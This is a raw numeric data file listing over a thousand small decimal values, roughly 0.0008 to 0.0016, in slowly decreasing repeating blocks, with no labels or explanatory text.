0.00161929
0.00162294
0.00162293
0.00161912
0.0016455
0.00164932
0.00164932
0.00164594
0.00164567
0.00164567
0.00164946
0.00162307
0.0016227
0.00161929
0.00161929
0.00162294
0.00162293
0.00161912
0.00162308
0.0016227
0.00161929
0.00161929
0.00161912
0.00162293
0.00162294
0.00161034
0.00161415
0.00161415
0.00161076
0.00161429
0.00161051
0.00161051
0.00158795
0.00158756
0.00158416
0.00158416
0.0015878
0.0015878
0.00158399
0.00161034
0.00161415
0.00161414
0.00161076
0.0016105
0.00161429
0.00161051
0.00158795
0.00158757
0.00158417
0.00158416
0.0015878
0.0015878
0.00158399
0.00161033
0.00161414
0.00161414
0.00161076
0.0016105
0.00161429
0.0016105
0.00158794
0.00158757
0.00158416
0.00158417
0.0015878
0.0015878
0.001584
0.00158794
0.00158756
0.00158416
0.00158416
0.00158399
0.0015878
0.0015878
0.00157522
0.00157903
0.00157903
0.00157565
0.00157917
0.00157539
0.00157539
0.00155285
0.00155247
0.00154907
0.00154907
0.00155271
0.0015527
0.0015489
0.00157522
0.00157902
0.00157902
0.00157564
0.00157539
0.00157917
0.00157539
0.00155285
0.00155247
0.00154907
0.00154907
0.00155271
0.00155271
0.0015489
0.00157523
0.00157903
0.00157903
0.00157564
0.00157539
0.00157917
0.00157539
0.00155285
0.00155247
0.00154907
0.00154907
0.00155271
0.00155271
0.0015489
0.00155285
0.00155246
0.00154907
0.00154907
0.0015489
0.00155271
0.0015527
0.00154013
0.00154393
0.00154393
0.00154055
0.00154408
0.0015403
0.0015403
0.00151777
0.00151737
0.00151398
0.00151398
0.00151762
0.00151762
0.00151382
0.00154014
0.00154393
0.00154393
0.00154055
0.0015403
0.00154408
0.0015403
0.00151777
0.00151738
0.00151399
0.00151399
0.00151762
0.00151762
0.00151382
0.00154013
0.00154393
0.00154393
0.00154055
0.0015403
0.00154408
0.0015403
0.00151777
0.00151737
0.00151397
0.00151398
0.00151761
0.00151762
0.00151382
0.00151778
0.00151738
0.00151399
0.00151399
0.00151383
0.00151762
0.00151762
0.00150505
0.00150884
0.00150884
0.00150545
0.001509
0.00150521
0.00150521
0.00148269
0.00148229
0.0014789
0.0014789
0.00148254
0.00148254
0.00147874
0.00150506
0.00150885
0.00150885
0.00150546
0.00150521
0.001509
0.00150522
0.0014827
0.00148228
0.0014789
0.0014789
0.00148254
0.00148254
0.00147874
0.00150505
0.00150884
0.00150884
0.00150546
0.00150521
0.00150899
0.00150521
0.00148269
0.00148229
0.0014789
0.0014789
0.00148254
0.00148254
0.00147874
0.0014827
0.00148229
0.00147891
0.0014789
0.00147874
0.00148254
0.00148254
0.00146997
0.00147377
0.00147377
0.00147037
0.00147392
0.00147013
0.00147013
0.00144761
0.0014472
0.00144382
0.00144381
0.00144746
0.00144746
0.00144366
0.00146997
0.00147376
0.00147376
0.00147037
0.00147013
0.00147392
0.00147013
0.00144761
0.00144721
0.00144381
0.00144381
0.00144745
0.00144746
0.00144365
0.00146997
0.00147376
0.00147376
0.00147037
0.00147013
0.00147392
0.00147013
0.00144761
0.00144721
0.00144382
0.00144382
0.00144745
0.00144746
0.00144366
0.0014476
0.00144721
0.00144382
0.00144382
0.00144365
0.00144746
0.00144746
0.00143489
0.00143868
0.00143868
0.00143528
0.00143883
0.00143504
0.00143504
0.00141252
0.00141212
0.00140873
0.00140873
0.00141237
0.00141237
0.00140857
0.00143488
0.00143867
0.00143867
0.00143529
0.00143504
0.00143883
0.00143504
0.00141252
0.00141211
0.00140873
0.00140873
0.00141237
0.00141237
0.00140857
0.00143489
0.00143868
0.00143868
0.00143528
0.00143505
0.00143884
0.00143505
0.00141252
0.00141212
0.00140873
0.00140873
0.00141237
0.00141237
0.00140857
0.00141252
0.00141211
0.00140873
0.00140873
0.00140857
0.00141236
0.00141236
0.0013998
0.0014036
0.0014036
0.0014002
0.00140375
0.00139996
0.00139996
0.00137744
0.00137703
0.00137365
0.00137365
0.00137728
0.00137729
0.00137349
0.0013998
0.00140359
0.00140359
0.0014002
0.00139996
0.00140375
0.00139996
0.00137745
0.00137703
0.00137365
0.00137365
0.00137729
0.00137729
0.00137349
0.0013998
0.00140359
0.00140359
0.0014002
0.00139996
0.00140375
0.00139996
0.00137744
0.00137704
0.00137365
0.00137365
0.00137729
0.00137729
0.00137349
0.00137744
0.00137704
0.00137365
0.00137365
0.00137349
0.00137729
0.00137729
0.00136473
0.00136852
0.00136852
0.00136512
0.00136868
0.00136489
0.00136488
0.00134237
0.00134196
0.00133858
0.00133858
0.00134222
0.00134221
0.00133842
0.00136473
0.00136852
0.00136852
0.00136512
0.00136489
0.00136867
0.00136489
0.00134237
0.00134196
0.00133858
0.00133858
0.00134221
0.00134222
0.00133842
0.00136473
0.00136852
0.00136852
0.00136513
0.00136489
0.00136867
0.00136489
0.00134237
0.00134196
0.00133858
0.00133858
0.00134221
0.00134221
0.00133842
0.00134238
0.00134196
0.00133858
0.00133858
0.00133843
0.00134222
0.00134222
0.00132965
0.00133343
0.00133344
0.00133004
0.0013336
0.0013298
0.0013298
0.00130729
0.00130688
0.0013035
0.0013035
0.00130714
0.00130714
0.00130334
0.00132966
0.00133344
0.00133344
0.00133005
0.00132981
0.0013336
0.00132981
0.00130729
0.00130688
0.0013035
0.0013035
0.00130714
0.00130714
0.00130334
0.00132966
0.00133344
0.00133344
0.00133005
0.00132981
0.0013336
0.00132981
0.00130729
0.00130688
0.0013035
0.00130349
0.00130714
0.00130714
0.00130334
0.0013073
0.00130689
0.0013035
0.0013035
0.00130334
0.00130714
0.00130714
0.00129457
0.00129836
0.00129837
0.00129497
0.00129852
0.00129473
0.00129473
0.00127221
0.0012718
0.00126841
0.00126841
0.00127205
0.00127205
0.00126825
0.00129457
0.00129836
0.00129836
0.00129497
0.00129472
0.00129852
0.00129473
0.00127221
0.0012718
0.00126841
0.00126841
0.00127205
0.00127205
0.00126826
0.00129457
0.00129836
0.00129836
0.00129497
0.00129473
0.00129852
0.00129473
0.00127221
0.0012718
0.00126841
0.00126841
0.00127205
0.00127205
0.00126825
0.00127221
0.0012718
0.00126842
0.00126842
0.00126826
0.00127205
0.00127205
0.00125948
0.00126328
0.00126328
0.00125988
0.00126343
0.00125964
0.00125964
0.00123712
0.00123671
0.00123332
0.00123332
0.00123697
0.00123697
0.00123317
0.00125949
0.00126328
0.00126328
0.00125988
0.00125964
0.00126344
0.00125964
0.00123711
0.00123671
0.00123332
0.00123332
0.00123696
0.00123696
0.00123316
0.00125948
0.00126327
0.00126327
0.00125988
0.00125964
0.00126343
0.00125964
0.00123712
0.00123671
0.00123332
0.00123332
0.00123696
0.00123696
0.00123316
0.00123711
0.00123671
0.00123332
0.00123332
0.00123316
0.00123696
0.00123696
0.0012244
0.00122818
0.00122818
0.00122478
0.00122835
0.00122455
0.00122455
0.00120202
0.00120161
0.00119822
0.00119822
0.00120186
0.00120186
0.00119806
0.00122439
0.00122818
0.00122818
0.00122479
0.00122455
0.00122834
0.00122455
0.00120201
0.00120161
0.00119822
0.00119822
0.00120186
0.00120186
0.00119806
0.00122439
0.00122818
0.00122818
0.00122478
0.00122454
0.00122834
0.00122454
0.00120202
0.00120161
0.00119822
0.00119822
0.00120187
0.00120187
0.00119806
0.00120202
0.00120161
0.00119822
0.00119822
0.00119807
0.00120186
0.00120186
0.00118929
0.00119308
0.00119308
0.00118969
0.00119324
0.00118945
0.00118944
0.00116692
0.00116651
0.00116312
0.00116312
0.00116676
0.00116676
0.00116296
0.00118929
0.00119308
0.00119308
0.00118969
0.00118945
0.00119324
0.00118945
0.00116691
0.0011665
0.00116312
0.00116312
0.00116676
0.00116676
0.00116296
0.00118929
0.00119308
0.00119308
0.00118969
0.00118944
0.00119324
0.00118945
0.00116692
0.00116651
0.00116312
0.00116312
0.00116676
0.00116676
0.00116296
0.00116692
0.00116651
0.00116312
0.00116312
0.00116296
0.00116676
0.00116676
0.00115418
0.00115798
0.00115798
0.00115458
0.00115814
0.00115434
0.00115434
0.00113181
0.0011314
0.00112801
0.00112801
0.00113165
0.00113165
0.00112785
0.00115418
0.00115797
0.00115798
0.00115458
0.00115434
0.00115813
0.00115434
0.0011318
0.0011314
0.00112801
0.00112801
0.00113165
0.00113165
0.00112785
0.00115419
0.00115798
0.00115798
0.00115458
0.00115434
0.00115814
0.00115434
0.00113181
0.0011314
0.00112801
0.00112801
0.00113165
0.00113165
0.00112785
0.00113181
0.0011314
0.00112801
0.00112801
0.00112785
0.00113165
0.00113165
0.00111907
0.00112286
0.00112286
0.00111947
0.00112302
0.00111923
0.00111923
0.00109669
0.00109628
0.00109289
0.00109289
0.00109653
0.00109653
0.00109274
0.00111907
0.00112286
0.00112287
0.00111947
0.00111923
0.00112302
0.00111923
0.00109669
0.00109628
0.00109289
0.00109289
0.00109653
0.00109654
0.00109274
0.00111907
0.00112286
0.00112286
0.00111947
0.00111922
0.00112302
0.00111923
0.00109669
0.00109628
0.00109289
0.00109289
0.00109653
0.00109653
0.00109273
0.00109669
0.00109628
0.00109289
0.00109289
0.00109273
0.00109653
0.00109653
0.00108395
0.00108775
0.00108775
0.00108435
0.00108791
0.00108411
0.00108411
0.00106157
0.00106117
0.00105778
0.00105777
0.00106142
0.00106142
0.00105762
0.00108396
0.00108775
0.00108775
0.00108435
0.00108411
0.00108791
0.00108411
0.00106157
0.00106117
0.00105777
0.00105777
0.00106142
0.00106142
0.00105761
0.00108395
0.00108775
0.00108775
0.00108435
0.00108411
0.00108791
0.00108411
0.00106157
0.00106116
0.00105777
0.00105777
0.00106141
0.00106141
0.00105761
0.00106157
0.00106116
0.00105777
0.00105777
0.00105762
0.00106142
0.00106142
0.00104884
0.00105263
0.00105263
0.00104924
0.00105279
0.001049
0.001049
0.00102646
0.00102605
0.00102265
0.00102265
0.0010263
0.0010263
0.0010225
0.00104884
0.00105263
0.00105263
0.00104924
0.00104899
0.00105279
0.00104899
0.00102646
0.00102605
0.00102266
0.00102265
0.0010263
0.0010263
0.0010225
0.00104884
0.00105263
0.00105263
0.00104923
0.00104899
0.00105279
0.00104899
0.00102645
0.00102604
0.00102265
0.00102265
0.00102629
0.0010263
0.00102249
0.00102645
0.00102604
0.00102266
0.00102266
0.0010225
0.0010263
0.0010263
0.00101372
0.00101751
0.00101751
0.00101412
0.00101767
0.00101388
0.00101388
0.000991331
0.000990921
0.00098753
0.000987528
0.000991174
0.000991174
0.000987372
0.00101372
0.00101751
0.00101751
0.00101411
0.00101387
0.00101767
0.00101388
0.000991331
0.000990921
0.000987531
0.00098753
0.000991172
0.000991174
0.000987372
0.00101371
0.00101751
0.00101751
0.00101411
0.00101387
0.00101767
0.00101387
0.00099133
0.000990919
0.000987534
0.000987533
0.000991173
0.000991173
0.000987373
0.000991329
0.000990918
0.000987528
0.000987526
0.000987371
0.000991172
0.000991172
0.000978592
0.000982385
0.000982386
0.000978986
0.000982546
0.000978746
0.000978745
0.000956201
0.000955792
0.000952402
0.000952399
0.000956045
0.000956044
0.000952241
0.00097859
0.000982388
0.000982389
0.000978988
0.000978747
0.000982545
0.000978748
0.0009562
0.00095579
0.000952399
0.000952398
0.000956043
0.000956044
0.00095224
0.000978592
0.00098239
0.000982391
0.000978986
0.000978749
0.000982547
0.000978751
0.000956201
0.00095579
0.000952397
0.000952401
0.000956043
0.000956046
0.000952243
0.000956199
0.00095579
0.000952399
0.000952399
0.000952241
0.000956042
0.000956042
0.000943461
0.000947258
0.000947257
0.000943857
0.000947415
0.000943618
0.000943616
0.000921069
0.00092066
0.000917268
0.000917268
0.000920912
0.000920912
0.000917108
0.000943458
0.000947254
0.000947254
0.000943854
0.000943611
0.000947412
0.000943614
0.000921069
0.000920658
0.000917269
0.000917268
0.00092091
0.000920911
0.000917108
0.00094346
0.00094725
0.000947254
0.000943854
0.000943611
0.000947414
0.000943613
0.000921068
0.000920659
0.000917267
0.000917267
0.000920911
0.000920911
0.000917108
0.000921069
0.000920658
0.000917269
0.000917269
0.000917111
0.000920912
0.000920912
0.00090833
0.000912124
0.000912126
0.000908725
0.000912283
0.000908486
0.000908485
0.000885937
0.000885527
0.000882134
0.000882135
0.000885778
0.00088578
0.000881977
0.000908329
0.000912128
0.000912128
0.000908726
0.000908486
0.000912282
0.000908488
0.000885938
0.000885527
0.000882134
0.000882134
0.000885779
0.00088578
0.000881977
0.000908328
0.000912122
0.000912125
0.000908723
0.000908483
0.000912281
0.000908483
0.000885937
0.000885528
0.000882136
0.000882138
0.000885779
0.000885782
0.000881978
0.000885937
0.000885528
0.000882138
0.000882138
0.00088198
0.000885781
0.00088578
0.000873198
0.000876991
0.000876993
0.000873593
0.000877151
0.000873354
0.000873354
0.000850806
0.000850398
0.000847005
0.000847004
0.00085065
0.00085065
0.000846846
0.000873196
0.00087699
0.000876992
0.000873592
0.000873351
0.00087715
0.000873352
0.000850806
0.000850397
0.000847005
0.000847006
0.000850649
0.00085065
0.000846847
0.000873199
0.000876994
0.000876996
0.000873595
0.000873353
0.000877153
0.000873356
0.000850808
0.000850399
0.000847009
0.000847009
0.00085065
0.000850652
0.000846849
0.00085081
0.0008504
0.000847009
0.000847008
0.000846851
0.000850655
0.000850654
0.000838067
0.000841862
0.000841863
0.000838462
0.00084202
0.000838224
0.000838222
0.000815679
0.000815267
0.000811875
0.000811875
0.00081552
0.000815521
0.000811719
0.000838066
0.000841861
0.000841864
0.000838462
0.000838221
0.000842019
0.000838222
0.000815675
0.000815265
0.000811877
0.000811873
0.000815518
0.000815517
0.000811716
0.00083807
0.000841867
0.000841867
0.000838465
0.000838223
0.000842025
0.000838226
0.000815681
0.00081527
0.00081188
0.00081188
0.000815522
0.000815523
0.000811721
0.000815677
0.00081527
0.000811879
0.000811879
0.000811719
0.000815523
0.000815524
0.000802939
0.00080673
0.000806733
0.000803333
0.000806893
0.000803091
0.000803094
0.000780552
0.000780142
0.000776752
0.000776752
0.000780395
0.000780396
0.000776594
0.000802937
0.000806733
0.000806732
0.000803332
0.000803092
0.00080689
0.000803092
0.000780549
0.00078014
0.000776752
0.00077675
0.000780392
0.000780393
0.000776592
0.000802941
0.000806736
0.000806737
0.000803336
0.000803095
0.000806896
0.000803097
0.000780552
0.000780143
0.000776753
0.000776751
0.000780395
0.000780396
0.000776595
0.000780553
0.000780142
0.000776752
0.000776752
0.000780397
0.000780396
0.000776597
0.00164755
0.00164755
0.00163875
0.00163875
0.00163875
0.00163875
0.00164755
0.00164755
0.00164755
0.00163875
0.00163875
0.00163875
0.00163875
0.00164755
0.00164755
0.00164755
0.00163875
0.00163875
0.00163875
0.00163875
0.00164754
0.00162996
0.00162117
0.00162116
0.00162996
0.00162995
0.00162996
0.00162116
0.00162995
0.00162116
0.00162116
0.00162996
0.00162995
0.00162995
0.00162116
0.00162995
0.00162116
0.00162116
0.00162995
0.00162995
0.00162995
0.00162116
0.00162995
0.00162116
0.00162116
0.00162995
0.00162995
0.00162995
0.00162116
0.0016405
0.00163665
0.00163689
0.0016407
0.00164071
0.00164051
0.00163688
0.00164565
0.00164941
0.00164539
0.00164953
0.00164554
0.00164543
0.00164933
0.00164053
0.00163663
0.00164075
0.00163674
0.00164061
0.00164072
0.00163685
0.00164568
0.00164546
0.00164951
0.0016493
0.00164545
0.00164568
0.0016493
0.0016405
0.00163689
0.00163665
0.0016407
0.00164051
0.00164071
0.00163688
0.00164565
0.00164941
0.00164539
0.00164952
0.00164554
0.00164543
0.00164934
0.00164053
0.00163663
0.00164075
0.00163674
0.00164061
0.00164072
0.00163685
0.00164568
0.00164546
0.00164931
0.0016495
0.00164568
0.00164545
0.0016493
0.00164067
0.00164029
0.00163688
0.00163688
0.00164053
0.00164053
0.00163671
0.00161237
0.00161237
0.00160358
0.00160358
0.00160358
0.00160358
0.00161237
0.00161237
0.00161237
0.00160358
0.00160358
0.00160358
0.00160358
0.00161237
0.00161237
0.00161237
0.00160358
0.00160358
0.00160358
0.00160358
0.00161237
0.0015948
0.00158602
0.00158602
0.0015948
0.0015948
0.0015948
0.00158602
0.0015948
0.00158602
0.00158602
0.0015948
0.0015948
0.0015948
0.00158602
0.0015948
0.00158602
0.00158602
0.0015948
0.0015948
0.0015948
0.00158602
0.0015948
0.00158602
0.00158602
0.0015948
0.0015948
0.0015948
0.00158602
0.00160534
0.00160554
0.0016015
0.00160173
0.00160555
0.00160535
0.00160173
0.00161048
0.00161423
0.00161435
0.00161022
0.00161416
0.00161037
0.00161026
0.00161052
0.00161029
0.00161433
0.00161413
0.00161413
0.00161029
0.00161052
0.00160537
0.00160148
0.00160559
0.00160159
0.00160545
0.00160556
0.0016017
0.00160534
0.00160554
0.00160173
0.0016015
0.00160535
0.00160554
0.00160173
0.00161048
0.00161423
0.00161434
0.00161022
0.00161416
0.00161037
0.00161026
0.00161051
0.00161029
0.00161413
0.00161433
0.00161412
0.00161052
0.00161028
0.00160537
0.00160148
0.00160559
0.00160159
0.00160545
0.00160556
0.00160169
0.0016055
0.00160512
0.00160172
0.00160172
0.00160536
0.00160536
0.00160155
0.00157724
0.00157724
0.00156847
0.00156846
0.00156847
0.00156846
0.00157724
0.00157724
0.00157724
0.00156846
0.00156846
0.00156846
0.00156846
0.00157724
0.00157724
0.00157724
0.00156846
0.00156846
0.00156846
0.00156846
0.00157724
0.00155969
0.00155092
0.00155092
0.00155969
0.00155969
0.00155969
0.00155092
0.00155969
0.00155092
0.00155092
0.00155969
0.00155969
0.00155969
0.00155092
0.00155969
0.00155092
0.00155092
0.00155969
0.00155969
0.00155969
0.00155092
0.00155969
0.00155092
0.00155092
0.00155969
0.00155969
0.00155969
0.00155092
0.00157023
0.00157043
0.00156639
0.00156662
0.00157044
0.00157024
0.00156662
0.00157537
0.00157912
0.00157923
0.00157511
0.00157904
0.00157526
0.00157515
0.0015754
0.00157518
0.00157921
0.00157901
0.00157901
0.00157517
0.0015754
0.00157026
0.00156638
0.00157048
0.00156649
0.00157035
0.00157045
0.00156659
0.00157023
0.00157044
0.00156662
0.0015664
0.00157024
0.00157044
0.00156662
0.00157536
0.00157912
0.00157923
0.00157511
0.00157904
0.00157526
0.00157515
0.0015754
0.00157518
0.00157901
0.00157921
0.00157901
0.0015754
0.00157517
0.00157026
0.00156638
0.00157049
0.00156649
0.00157035
0.00157046
0.00156659
0.0015704
0.00157001
0.00156661
0.00156661
0.00157025
0.00157025
0.00156644
0.00154214
0.00154214
0.00153337
0.00153337
0.00153337
0.00153336
0.00154214
0.00154214
0.00154214
0.00153337
0.00153337
0.00153337
0.00153336
0.00154214
0.00154214
0.00154214
0.00153337
0.00153337
0.00153337
0.00153336
0.00154214
0.00152459
0.00151582
0.00151582
0.00152459
0.00152459
0.00152459
0.00151582
0.0015246
0.00151582
0.00151582
0.0015246
0.00152459
0.00152459
0.00151582
0.00152459
0.00151582
0.00151582
0.00152459
0.00152459
0.00152459
0.00151582
0.0015246
0.00151582
0.00151582
0.00152459
0.00152459
0.00152459
0.00151582
0.00153514
0.00153535
0.00153131
0.00153153
0.00153535
0.00153515
0.00153153
0.00154028
0.00154403
0.00154414
0.00154003
0.00154395
0.00154017
0.00154007
0.00154031
0.00154009
0.00154412
0.00154392
0.00154391
0.00154008
0.00154031
0.00153517
0.0015313
0.0015354
0.0015314
0.00153526
0.00153537
0.0015315
0.00153514
0.00153534
0.00153153
0.00153131
0.00153515
0.00153535
0.00153153
0.00154027
0.00154403
0.00154414
0.00154002
0.00154395
0.00154017
0.00154006
0.00154031
0.00154008
0.00154392
0.00154412
0.00154392
0.00154031
0.00154008
0.00153517
0.00153129
0.0015354
0.0015314
0.00153526
0.00153537
0.0015315
0.00153531
0.00153492
0.00153152
0.00153153
0.00153516
0.00153516
0.00153136
0.00150705
0.00150705
0.00149828
0.00149828
0.00149828
0.00149827
0.00150705
0.00150705
0.00150705
0.00149828
0.00149827
0.00149828
0.00149827
0.00150704
0.00150705
0.00150705
0.00149828
0.00149828
0.00149828
0.00149827
0.00150705
0.00148951
0.00148073
0.00148073
0.00148951
0.0014895
0.0014895
0.00148073
0.00148951
0.00148073
0.00148073
0.00148951
0.00148951
0.0014895
0.00148073
0.00148951
0.00148073
0.00148073
0.0014895
0.00148951
0.0014895
0.00148073
0.00148951
0.00148073
0.00148074
0.00148951
0.00148951
0.0014895
0.00148073
0.00150006
0.00150028
0.00149624
0.00149645
0.00150028
0.00150006
0.00149645
0.00150519
0.00150895
0.00150906
0.00150495
0.00150886
0.00150509
0.00150499
0.00150523
0.00150502
0.00150905
0.00150884
0.00150884
0.00150501
0.00150523
0.00150009
0.00149622
0.00150033
0.00149633
0.00150018
0.0015003
0.00149642
0.00150005
0.00150027
0.00149644
0.00149623
0.00150006
0.00150027
0.00149645
0.00150519
0.00150894
0.00150906
0.00150494
0.00150886
0.00150509
0.00150498
0.00150522
0.00150501
0.00150883
0.00150904
0.00150883
0.00150522
0.001505
0.00150008
0.00149621
0.00150031
0.00149632
0.00150017
0.00150029
0.00149641
0.00150024
0.00149983
0.00149644
0.00149644
0.00150008
0.00150008
0.00149629
0.00147196
0.00147196
0.0014632
0.00146319
0.00146319
0.00146319
0.00147196
0.00147196
0.00147196
0.00146319
0.00146319
0.00146319
0.00146318
0.00147196
0.00147196
0.00147196
0.0014632
0.00146319
0.00146319
0.00146319
0.00147196
0.00145442
0.00144565
0.00144564
0.00145442
0.00145442
0.00145442
0.00144564
0.00145443
0.00144565
0.00144565
0.00145442
0.00145442
0.00145442
0.00144564
0.00145442
0.00144565
0.00144565
0.00145442
0.00145442
0.00145442
0.00144565
0.00145442
0.00144565
0.00144565
0.00145442
0.00145442
0.00145442
0.00144565
0.00146497
0.00146519
0.00146115
0.00146136
0.00146519
0.00146498
0.00146136
0.0014701
0.00147387
0.00147399
0.00146987
0.00147378
0.00147001
0.0014699
0.00147014
0.00146993
0.00147397
0.00147375
0.00147375
0.00146993
0.00147014
0.001465
0.00146113
0.00146525
0.00146124
0.0014651
0.00146521
0.00146133
0.00146497
0.00146519
0.00146136
0.00146115
0.00146497
0.00146519
0.00146136
0.0014701
0.00147386
0.00147398
0.00146986
0.00147377
0.00147
0.0014699
0.00147014
0.00146993
0.00147375
0.00147396
0.00147374
0.00147014
0.00146992
0.001465
0.00146113
0.00146524
0.00146124
0.00146509
0.00146521
0.00146133
0.00146514
0.00146475
0.00146136
0.00146136
0.00146499
0.001465
0.00146119
0.00143687
0.00143687
0.00142811
0.0014281
0.0014281
0.0014281
0.00143687
0.00143687
0.00143687
0.00142811
0.0014281
0.0014281
0.0014281
0.00143687
0.00143687
0.00143687
0.00142811
0.0014281
0.0014281
0.0014281
0.00143687
0.00141934
0.00141056
0.00141056
0.00141933
0.00141933
0.00141933
0.00141056
0.00141934
0.00141056
0.00141056
0.00141933
0.00141933
0.00141933
0.00141056
0.00141934
0.00141056
0.00141056
0.00141933
0.00141933
0.00141933
0.00141056
0.00141934
0.00141056
0.00141056
0.00141933
0.00141933
0.00141933
0.00141056
0.00142989
0.00143011
0.00142606
0.00142628
0.00143011
0.00142989
0.00142628
0.00143502
0.00143878
0.00143889
0.00143478
0.00143869
0.00143492
0.00143481
0.00143506
0.00143484
0.00143888
0.00143866
0.00143866
0.00143484
0.00143505
0.00142992
0.00142605
0.00143015
0.00142615
0.00143001
0.00143012
0.00142625
0.00142988
0.00143011
0.00142627
0.00142607
0.00142989
0.00143011
0.00142628
0.00143502
0.00143878
0.0014389
0.00143479
0.00143869
0.00143493
0.00143482
0.00143506
0.00143485
0.00143866
0.00143888
0.00143866
0.00143505
0.00143484
0.00142992
0.00142605
0.00143017
0.00142616
0.00143001
0.00143014
0.00142625
0.00143006
0.00142966
0.00142627
0.00142627
0.00142991
0.00142991
0.00142611
0.00140179
0.00140179
0.00139302
0.00139302
0.00139302
0.00139301
0.00140178
0.00140179
0.00140179
0.00139303
0.00139302
0.00139302
0.00139301
0.00140179
0.00140179
0.00140179
0.00139303
0.00139302
0.00139302
0.00139301
0.00140179
0.00138425
0.00137548
0.00137548
0.00138425
0.00138425
0.00138425
0.00137548
0.00138425
0.00137548
0.00137548
0.00138425
0.00138425
0.00138425
0.00137548
0.00138426
0.00137548
0.00137548
0.00138425
0.00138425
0.00138425
0.00137548
0.00138426
0.00137548
0.00137548
0.00138425
0.00138425
0.00138425
0.00137548
0.0013948
0.00139502
0.00139098
0.00139119
0.00139502
0.00139481
0.00139119
0.00139993
0.00140369
0.00140381
0.0013997
0.00140361
0.00139984
0.00139973
0.00139997
0.00139976
0.00140379
0.00140358
0.00140357
0.00139975
0.00139997
0.00139483
0.00139096
0.00139507
0.00139107
0.00139492
0.00139504
0.00139116
0.0013948
0.00139502
0.0013912
0.00139099
0.00139481
0.00139503
0.0013912
0.00139994
0.0014037
0.00140382
0.0013997
0.00140361
0.00139984
0.00139974
0.00139997
0.00139976
0.00140358
0.0014038
0.00140358
0.00139997
0.00139976
0.00139483
0.00139097
0.00139508
0.00139107
0.00139493
0.00139504
0.00139117
0.00139498
0.00139457
0.00139119
0.00139119
0.00139483
0.00139483
0.00139103
0.00136671
0.00136671
0.00135795
0.00135794
0.00135795
0.00135794
0.00136671
0.00136671
0.00136671
0.00135795
0.00135794
0.00135795
0.00135794
0.00136671
0.00136671
0.00136671
0.00135795
0.00135794
0.00135795
0.00135794
0.00136671
0.00134918
0.00134041
0.0013404
0.00134918
0.00134918
0.00134917
0.0013404
0.00134918
0.00134041
0.00134041
0.00134918
0.00134918
0.00134917
0.0013404
0.00134918
0.0013404
0.00134041
0.00134917
0.00134918
0.00134917
0.0013404
0.00134918
0.00134041
0.00134041
0.00134918
0.00134918
0.00134917
0.00134041
0.00135973
0.00135995
0.00135591
0.00135612
0.00135995
0.00135973
0.00135612
0.00136486
0.00136863
0.00136874
0.00136463
0.00136853
0.00136477
0.00136466
0.0013649
0.00136469
0.00136872
0.0013685
0.0013685
0.00136468
0.00136489
0.00135976
0.0013559
0.00136
0.001356
0.00135985
0.00135997
0.00135609
0.00135973
0.00135995
0.00135612
0.00135591
0.00135973
0.00135995
0.00135613
0.00136486
0.00136863
0.00136874
0.00136463
0.00136853
0.00136477
0.00136466
0.0013649
0.00136469
0.0013685
0.00136872
0.0013685
0.00136489
0.00136468
0.00135976
0.00135589
0.00136
0.001356
0.00135985
0.00135997
0.00135609
0.00135991
0.0013595
0.00135612
0.00135612
0.00135975
0.00135975
0.00135596
0.00133164
0.00133164
0.00132287
0.00132287
0.00132287
0.00132286
0.00133163
0.00133164
0.00133164
0.00132287
0.00132287
0.00132287
0.00132286
0.00133163
0.00133164
0.00133164
0.00132288
0.00132287
0.00132287
0.00132286
0.00133163
0.0013141
0.00130533
0.00130533
0.0013141
0.0013141
0.0013141
0.00130532
0.0013141
0.00130533
0.00130533
0.0013141
0.0013141
0.0013141
0.00130532
0.0013141
0.00130533
0.00130533
0.0013141
0.0013141
0.0013141
0.00130533
0.0013141
0.00130533
0.00130533
0.0013141
0.0013141
0.00131409
0.00130533
0.00132465
0.00132488
0.00132084
0.00132105
0.00132488
0.00132466
0.00132105
0.00132979
0.00133355
0.00133367
0.00132955
0.00133346
0.00132969
0.00132959
0.00132982
0.00132962
0.00133365
0.00133343
0.00133343
0.00132961
0.00132982
0.00132468
0.00132082
0.00132493
0.00132092
0.00132478
0.0013249
0.00132102
0.00132465
0.00132488
0.00132105
0.00132084
0.00132466
0.00132488
0.00132105
0.00132979
0.00133355
0.00133367
0.00132956
0.00133346
0.00132969
0.00132959
0.00132982
0.00132962
0.00133343
0.00133365
0.00133343
0.00132982
0.00132961
0.00132469
0.00132082
0.00132493
0.00132093
0.00132478
0.0013249
0.00132102
0.00132483
0.00132442
0.00132104
0.00132104
0.00132468
0.00132468
0.00132088
0.00129656
0.00129656
0.00128779
0.00128779
0.00128778
0.00128778
0.00129655
0.00129656
0.00129656
0.00128779
0.00128779
0.00128779
0.00128778
0.00129655
0.00129655
0.00129656
0.00128779
0.00128778
0.00128779
0.00128778
0.00129655
0.00127902
0.00127024
0.00127024
0.00127901
0.00127902
0.00127901
0.00127024
0.00127902
0.00127024
0.00127024
0.00127901
0.00127901
0.00127901
0.00127024
0.00127902
0.00127024
0.00127024
0.00127901
0.00127901
0.00127901
0.00127024
0.00127902
0.00127024
0.00127024
0.00127901
0.00127901
0.00127901
0.00127024
0.00128957
0.00128979
0.00128575
0.00128596
0.0012898
0.00128958
0.00128596
0.00129471
0.00129847
0.00129859
0.00129447
0.00129838
0.00129461
0.0012945
0.00129474
0.00129453
0.00129857
0.00129834
0.00129835
0.00129453
0.00129474
0.0012896
0.00128574
0.00128985
0.00128584
0.0012897
0.00128981
0.00128593
0.00128957
0.00128979
0.00128596
0.00128575
0.00128958
0.0012898
0.00128597
0.00129471
0.00129847
0.00129859
0.00129447
0.00129838
0.00129461
0.00129451
0.00129474
0.00129453
0.00129835
0.00129857
0.00129835
0.00129474
0.00129453
0.00128961
0.00128574
0.00128984
0.00128584
0.0012897
0.00128982
0.00128593
0.00128975
0.00128934
0.00128596
0.00128596
0.00128959
0.00128959
0.0012858
0.00126147
0.00126147
0.0012527
0.0012527
0.0012527
0.00125269
0.00126146
0.00126147
0.00126147
0.0012527
0.0012527
0.0012527
0.00125269
0.00126146
0.00126147
0.00126147
0.0012527
0.00125269
0.00125269
0.00125269
0.00126146
0.00124393
0.00123515
0.00123515
0.00124392
0.00124392
0.00124392
0.00123514
0.00124393
0.00123514
0.00123515
0.00124392
0.00124392
0.00124392
0.00123514
0.00124393
0.00123515
0.00123515
0.00124392
0.00124392
0.00124392
0.00123514
0.00124392
0.00123514
0.00123515
0.00124392
0.00124392
0.00124392
0.00123514
0.00125448
0.0012547
0.00125066
0.00125087
0.00125471
0.00125448
0.00125087
0.00125962
0.00126338
0.0012635
0.00125939
0.00126329
0.00125952
0.00125942
0.00125965
0.00125944
0.00126348
0.00126326
0.00126326
0.00125944
